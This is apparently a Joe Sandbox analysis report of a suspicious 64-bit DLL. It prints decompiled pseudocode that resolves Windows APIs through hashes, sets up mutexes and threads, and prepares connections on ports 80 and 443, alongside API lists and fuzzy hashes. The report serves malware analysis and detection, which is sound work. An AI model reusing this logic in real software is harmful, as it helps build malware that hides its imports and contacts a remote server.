				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004a75;
				r9d = 0x18;
				r8d = 0;
				_v136 = 0xf0000040;
				 *_t114();
				goto 0x80004a77;
				if (0 == 0) goto 0x80004c20;
				r8d = _a56;
				_t10 =  &_v96; // -190
				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
				_t11 = _t114 + 0x10; // 0x10
				r15d = _t11;
				memset(??, ??, ??);
				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004ae3;
				r9d = 0;
				 *_t114();
				goto 0x80004ae5;
				if (0 != 0) goto 0x80004af9;
				if (GetLastError() != 0) goto 0x80004c02;
				_t57 =  >  ? r15d : _t95;
				r8d = _t57;
				_v104 = _t57;
				memcpy(??, ??, ??);
				_t96 = _t95 - _v104;
				if (r14d == 0) goto 0x80004b70;
				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004baa;
				r8d = 0;
				_t23 =  &_v104; // -198
				_v120 = 0x20;
				_v128 = _t23;
				_t26 =  &_v80; // -174
				r8b = _t96 == 0;
				_v136 = _t26;
				r9d = 0;
				 *_t114();
				goto 0x80004bac;
				E0000000118000459C(0x8ea73a36, _t114, _v96);
				if (_t114 == 0) goto 0x80004baa;
				r8d = 0;
				_t29 =  &_v104; // -198
				_v128 = _t29;
				r8b = _t96 == 0;
				_t31 =  &_v80; // -174
				_v136 = _t31;
				r9d = 0;
				 *_t114();
				goto 0x80004bac;
				if (0 == 0) goto 0x80004bd6;
				r8d = _v104;
				memcpy(??, ??, ??);
				if (_t96 == 0) goto 0x80004bde;
				goto 0x80004afd;
				GetLastError();
				_t115 = _a40;
				 *_t115 = 0 + _v104;
				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t115 == 0) goto 0x80004c02;
				 *_t115();
				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
				if (_t115 == 0) goto 0x80004c28;
				 *_t115();
				goto 0x80004c28;
				return GetLastError();
			}

0x180004a14
0x180004a14
0x180004a19
0x180004a1e
0x180004a33
0x180004a3a
0x180004a4c
0x180004a4f
0x180004a57
0x180004a5e
0x180004a64
0x180004a69
0x180004a71
0x180004a73
0x180004a79
0x180004a7f
0x180004a94
0x180004aa2
0x180004aa8
0x180004aa8
0x180004ab7
0x180004ac5
0x180004acd
0x180004adc
0x180004adf
0x180004ae1
0x180004ae7
0x180004af3
0x180004b07
0x180004b0e
0x180004b11
0x180004b15
0x180004b1e
0x180004b2c
0x180004b33
0x180004b3b
0x180004b3d
0x180004b40
0x180004b45
0x180004b4d
0x180004b52
0x180004b59
0x180004b5d
0x180004b67
0x180004b6c
0x180004b6e
0x180004b75
0x180004b7d
0x180004b7f
0x180004b82
0x180004b89
0x180004b8e
0x180004b92
0x180004b97
0x180004ba1
0x180004ba6
0x180004ba8
0x180004bae
0x180004bb0
0x180004bbd
0x180004bcf
0x180004bd1
0x180004bd6
0x180004bde
0x180004beb
0x180004bf1
0x180004bf9
0x180004c00
0x180004c0b
0x180004c13
0x180004c1c
0x180004c1e
0x180004c4a

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20

Strings

@, xrefs: 0000000180004A69
, xrefs: 0000000180004B45

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ErrorLast$memcpy$memset
String ID: $@
API String ID: 1408984137-1077428164
Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003A24 Relevance: 10.6, APIs: 7, Instructions: 137
synchronizationthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				long _t49;
				void* _t54;
				void* _t72;
				signed long long _t94;
				signed long long _t95;
				long long* _t97;
				int _t112;
				void* _t113;
				signed long long _t118;
				void* _t120;
				long long* _t126;
				void* _t128;
				signed long long _t129;
				void* _t131;

				 *((long long*)(_t120 + 8)) = __rbx;
				 *(_t120 + 0x10) = _t118;
				 *((long long*)(_t120 + 0x18)) = __rsi;
				_t116 =  *0x8000d4a0;
				_t113 = __r9;
				_t97 = __rcx;
				if (__r9 != 0) goto 0x80003a5b;
				goto 0x80003be2;
				r8d = 0x10;
				memcpy(_t131, _t128, _t112);
				InitializeCriticalSection(??);
				_t6 = _t97 + 0x88; // 0x88
				_t126 = _t6;
				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
				_t129 = _t128 | 0xffffffff;
				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
				r13d = _t129 + 2;
				r9d = 0;
				r8d = 0;
				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
				 *((long long*)(__rcx + 0x90)) = _t126;
				 *_t126 = _t126;
				 *(__rcx + 0x10) = _t129;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				r9d = 0;
				r8d = 0;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
				r8d = 0;
				CreateMutexA(??, ??, ??);
				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
				 *(__rcx + 0x38) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
				 *_t97 = E00000001180008368;
				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				_t72 = _t129 + 7;
				if (E00000001180008368 == 0) goto 0x80003b4c;
				r8d = _t72;
				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
				goto 0x80003b4f;
				_t94 = _t129;
				 *(_t97 + 0x10) = _t94;
				if (_t94 != _t129) goto 0x80003bb0;
				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t94 == 0) goto 0x80003b79;
				 *_t94();
				goto 0x80003b7b;
				if (0 != 0) goto 0x80003bd6;
				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t94 == 0) goto 0x80003ba4;
				r8d = _t72;
				 *_t94();
				goto 0x80003ba7;
				_t95 = _t129;
				 *(_t97 + 0x10) = _t95;
				if (_t95 == _t129) goto 0x80003bd6;
				_t28 = _t97 + 0x18; // 0x18
				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
				 *(_t97 + 8) = _t95;
				if (_t95 == 0) goto 0x80003bd6;
				SwitchToThread();
				goto 0x80003c03;
				_t49 = GetLastError();
				if (_t49 == 0) goto 0x80003c03;
				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
				if (r13d == 0) goto 0x80003c03;
				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t95 == 0) goto 0x80003c03;
				 *_t95();
				return _t49;
			}

0x180003a24
0x180003a29
0x180003a2e
0x180003a3f
0x180003a48
0x180003a4b
0x180003a51
0x180003a56
0x180003a5f
0x180003a65
0x180003a6e
0x180003a74
0x180003a74
0x180003a82
0x180003a89
0x180003a94
0x180003aa2
0x180003aa7
0x180003aaa
0x180003ab2
0x180003ab9
0x180003ac0
0x180003ac3
0x180003ac7
0x180003acd
0x180003ad4
0x180003ada
0x180003add
0x180003ae5
0x180003aeb
0x180003af2
0x180003af8
0x180003afc
0x180003b03
0x180003b09
0x180003b0d
0x180003b14
0x180003b1f
0x180003b29
0x180003b30
0x180003b35
0x180003b3d
0x180003b42
0x180003b48
0x180003b4a
0x180003b4c
0x180003b4f
0x180003b56
0x180003b61
0x180003b69
0x180003b75
0x180003b77
0x180003b7d
0x180003b8b
0x180003b93
0x180003b95
0x180003ba0
0x180003ba2
0x180003ba4
0x180003ba7
0x180003bae
0x180003bb0
0x180003bbe
0x180003bc3
0x180003bca
0x180003bcc
0x180003bd4
0x180003bd6
0x180003be0
0x180003be5
0x180003bec
0x180003bf7
0x180003bff
0x180003c01
0x180003c21

APIs

memcpy.NTDLL ref: 0000000180003A65
InitializeCriticalSection.KERNEL32 ref: 0000000180003A6E
CreateEventA.KERNEL32 ref: 0000000180003AC7
CreateEventA.KERNEL32 ref: 0000000180003AE5
CreateMutexA.KERNEL32 ref: 0000000180003B03
SwitchToThread.KERNEL32 ref: 0000000180003BCC

Part of subcall function 0000000180007950: SetEvent.KERNEL32 ref: 000000018000798D
Part of subcall function 0000000180007950: WaitForSingleObject.KERNEL32 ref: 00000001800079AA
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079B4
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079C3
Part of subcall function 0000000180007950: EnterCriticalSection.KERNEL32 ref: 00000001800079CD
Part of subcall function 0000000180007950: LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Part of subcall function 0000000180007950: Sleep.KERNEL32 ref: 0000000180007A17
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A2F
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A3E
Part of subcall function 0000000180007950: HeapFree.KERNEL32 ref: 0000000180007A51
Part of subcall function 0000000180007950: DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
String ID:
API String ID: 810493412-0
Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002B60 Relevance: 7.7, APIs: 5, Instructions: 244
memorytimeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00000001180002B60(void* __esi, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t79;
				signed int _t94;
				void* _t143;
				void* _t144;
				long long _t174;
				long long* _t175;
				long long* _t178;
				void* _t180;
				long long _t182;
				void* _t190;
				intOrPtr _t211;
				void* _t224;
				void* _t225;
				long long _t228;
				void* _t229;
				void* _t255;
				signed long long _t256;

				_t256 = __r11;
				_t255 = __r10;
				_t144 = __esi;
				_t174 = _t228;
				_t229 = _t228 - 0x60;
				r12d =  *0x8000d498;
				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
				_t225 = __rcx;
				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
				if (_t79 == 0) goto 0x80002bd9;
				HeapFree(??, ??, ??);
				if (_t79 != 0) goto 0x80002f0d;
				_t190 = _t229 + 0x48;
				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
				_t182 = _t174;
				goto 0x80002c2d;
				if (_t182 == 0) goto 0x80002ec8;
				_t21 = _t225 + 0xb0; // 0xb0
				 *((long long*)(_t229 + 0x28)) = _t182;
				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
				_t175 =  *((intOrPtr*)(_t225 + 0x28));
				 *((long long*)(_t229 + 0x40)) = _t175;
				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
				goto 0x80002cb8;
				 *(_t229 + 0xa8) = 0;
				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				r15d = 0x7f;
				if (_t175 == 0) goto 0x80002cec;
				r9d = 0;
				r8d = 0;
				 *_t175();
				goto 0x80002cef;
				if (r15d != 0x102) goto 0x80002ec8;
				 *(_t225 + 0x64) = 0x3e8;
				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
				r9d = 0;
				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
				_t94 =  *(_t229 + 0xa8);
				if (_t94 == 0) goto 0x80002d8f;
				 *(_t225 + 0x64) = _t94 * 0x3e8;
				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
				goto 0x80002ddb;
				 *(_t229 + 0xa8) = 0;
				r12d = r12d ^ 0xe5c7ba87;
				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
				GetSystemTimeAsFileTime(??);
				r11d =  *((intOrPtr*)(_t229 + 0xb8));
				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
				 *((long long*)(_t225 + 0x58)) = _t178;
				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
				r8d =  *((intOrPtr*)(_t229 + 0x30));
				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t178 == 0) goto 0x80002e97;
				r8d = 0;
				r9d = 0;
				r9d = r9d * 0x3e8;
				 *_t178();
				goto 0x80002e9a;
				_t143 = r15d;
				if (_t143 != 0) goto 0x80002e40;
				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
				HeapFree(??, ??, ??);
				E00000001180002620();
				_t211 =  *0x8000d4a0;
				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
				HeapFree(??, ??, ??);
				asm("lock inc ecx");
				return _t143;
			}

0x180002b60
0x180002b60
0x180002b60
0x180002b60
0x180002b6d
0x180002b7f
0x180002b86
0x180002b8a
0x180002ba9
0x180002bb7
0x180002bc0
0x180002bd3
0x180002bdb
0x180002be1
0x180002bef
0x180002bfc
0x180002c11
0x180002c1a
0x180002c21
0x180002c26
0x180002c29
0x180002c30
0x180002c43
0x180002c4a
0x180002c4f
0x180002c5d
0x180002c63
0x180002c80
0x180002c8c
0x180002ca4
0x180002cad
0x180002cb1
0x180002cc1
0x180002cc6
0x180002ccf
0x180002ce0
0x180002ce3
0x180002ce6
0x180002cea
0x180002cf5
0x180002d14
0x180002d22
0x180002d29
0x180002d36
0x180002d3c
0x180002d61
0x180002d79
0x180002d7b
0x180002d84
0x180002d8c
0x180002daf
0x180002dc7
0x180002dd0
0x180002dd4
0x180002ddb
0x180002dfc
0x180002e14
0x180002e1b
0x180002e21
0x180002e2c
0x180002e37
0x180002e3c
0x180002e54
0x180002e56
0x180002e63
0x180002e71
0x180002e79
0x180002e7b
0x180002e7e
0x180002e8a
0x180002e91
0x180002e95
0x180002e97
0x180002e9c
0x180002ea5
0x180002eb5
0x180002ec2
0x180002ecd
0x180002ed2
0x180002ee3
0x180002eeb
0x180002eff
0x180002f07
0x180002f0d
0x180002f23

APIs

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
HeapFree.KERNEL32 ref: 0000000180002EC2
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Free$Heap$LibraryTime$FileLoadSystem
String ID:
API String ID: 1415693639-0
Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800027D4 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 187
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t100;
				long long* _t119;
				long long* _t120;
				long long* _t121;
				long long* _t122;
				long long* _t123;
				void* _t151;
				void* _t152;
				intOrPtr* _t153;
				void* _t155;
				void* _t158;
				long long* _t161;
				void* _t163;
				void* _t164;
				long _t176;
				void* _t178;
				void* _t181;
				void* _t184;

				_t123 = __rbx;
				 *((long long*)(_t163 + 0x10)) = __rbx;
				 *(_t163 + 0x18) = r8d;
				_t164 = _t163 - 0x50;
				_t119 =  *0x8000d4a0;
				_t156 =  *__rcx;
				_t153 = __rcx;
				r15d = r9d;
				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
				if (_t119 == _t123) goto 0x80002a78;
				_t100 =  *((char*)(_t153 + 0x75)) - 6;
				_t5 = _t123 + 4; // 0x4
				r12d = _t5;
				if (_t100 > 0) goto 0x8000283e;
				if (_t100 != 0) goto 0x80002835;
				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
				 *((intOrPtr*)(_t164 + 0x90)) = 0;
				goto 0x80002846;
				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t119 == _t123) goto 0x80002871;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t164 + 0x20)) = 0;
				 *_t119();
				goto 0x80002874;
				_t120 = _t123;
				 *((long long*)(_t153 + 0x28)) = _t120;
				HeapFree(_t178, _t176, _t152);
				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x800028c4;
				_t17 = _t164 + 0xa0; // 0x12
				r9d = r12d;
				 *_t120();
				goto 0x800028c6;
				if (0 == 0) goto 0x80002a78;
				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
				if (_t120 == _t123) goto 0x80002a78;
				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x80002927;
				r9d = r12d;
				 *_t120();
				asm("bts dword [esp+0x90], 0x17");
				r12d = 0x1bb;
				goto 0x8000293e;
				r12d = 0x50;
				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x80002963;
				r9d = 0;
				r8d = r12w & 0xffffffff;
				 *_t120();
				goto 0x80002966;
				_t121 = _t123;
				 *((long long*)(_t153 + 0x30)) = _t121;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
				_t161 = _t121;
				if (_t121 == _t123) goto 0x80002a78;
				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t121 == _t123) goto 0x800029ed;
				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
				r9d = 0;
				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
				 *((long long*)(_t164 + 0x28)) = _t123;
				 *((long long*)(_t164 + 0x20)) = _t123;
				 *_t121();
				goto 0x800029f0;
				_t122 = _t123;
				 *((long long*)(_t153 + 0x38)) = _t122;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
				 *((intOrPtr*)(_t164 + 0x44)) = 4;
				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
				_t45 = _t161 + 0x1b; // 0x1f
				r12d = _t45;
				if (_t122 == _t123) goto 0x80002a40;
				 *_t122();
				goto 0x80002a42;
				if (0 == 0) goto 0x80002a80;
				asm("bts dword [esp+0x90], 0x8");
				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t122 == _t123) goto 0x80002a80;
				r9d = 4;
				 *_t122();
				goto 0x80002a80;
				return GetLastError();
			}

0x1800027d4
0x1800027d4
0x1800027d9
0x1800027e9
0x1800027ed
0x1800027f4
0x180002805
0x18000280d
0x180002810
0x18000281d
0x180002823
0x180002827
0x180002827
0x18000282b
0x18000282d
0x180002833
0x180002835
0x18000283c
0x18000283e
0x18000284f
0x180002857
0x180002860
0x180002863
0x180002869
0x18000286d
0x18000286f
0x180002871
0x18000287c
0x180002880
0x18000288a
0x180002897
0x1800028a2
0x1800028aa
0x1800028b0
0x1800028b8
0x1800028c0
0x1800028c2
0x1800028c8
0x1800028d4
0x1800028df
0x1800028e5
0x1800028f7
0x180002902
0x18000290a
0x180002912
0x18000291d
0x180002925
0x180002927
0x180002930
0x180002936
0x180002938
0x180002947
0x18000294f
0x180002955
0x180002958
0x18000295f
0x180002961
0x180002963
0x18000296e
0x180002972
0x18000297c
0x180002988
0x18000298d
0x180002993
0x1800029a2
0x1800029aa
0x1800029c9
0x1800029d4
0x1800029d7
0x1800029df
0x1800029e4
0x1800029e9
0x1800029eb
0x1800029ed
0x1800029f8
0x1800029fc
0x180002a06
0x180002a12
0x180002a1a
0x180002a1f
0x180002a1f
0x180002a26
0x180002a3c
0x180002a3e
0x180002a44
0x180002a46
0x180002a58
0x180002a60
0x180002a6e
0x180002a74
0x180002a76
0x180002a99

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

HeapFree.KERNEL32 ref: 0000000180002880
HeapFree.KERNEL32 ref: 0000000180002972
HeapFree.KERNEL32 ref: 00000001800029FC
GetLastError.KERNEL32(00000012,00000000,?,00000001800054C9,?,000000018000134F), ref: 0000000180002A78

Strings

P, xrefs: 0000000180002938

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Free$AllocErrorLastlstrlenmemset
String ID: P
API String ID: 1242601240-3110715001
Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800045E8 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000958C: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001800090B2), ref: 0000000180009595
Part of subcall function 000000018000958C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001800090B2), ref: 00000001800095A7

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000461B
LeaveCriticalSection.KERNEL32 ref: 0000000180004653

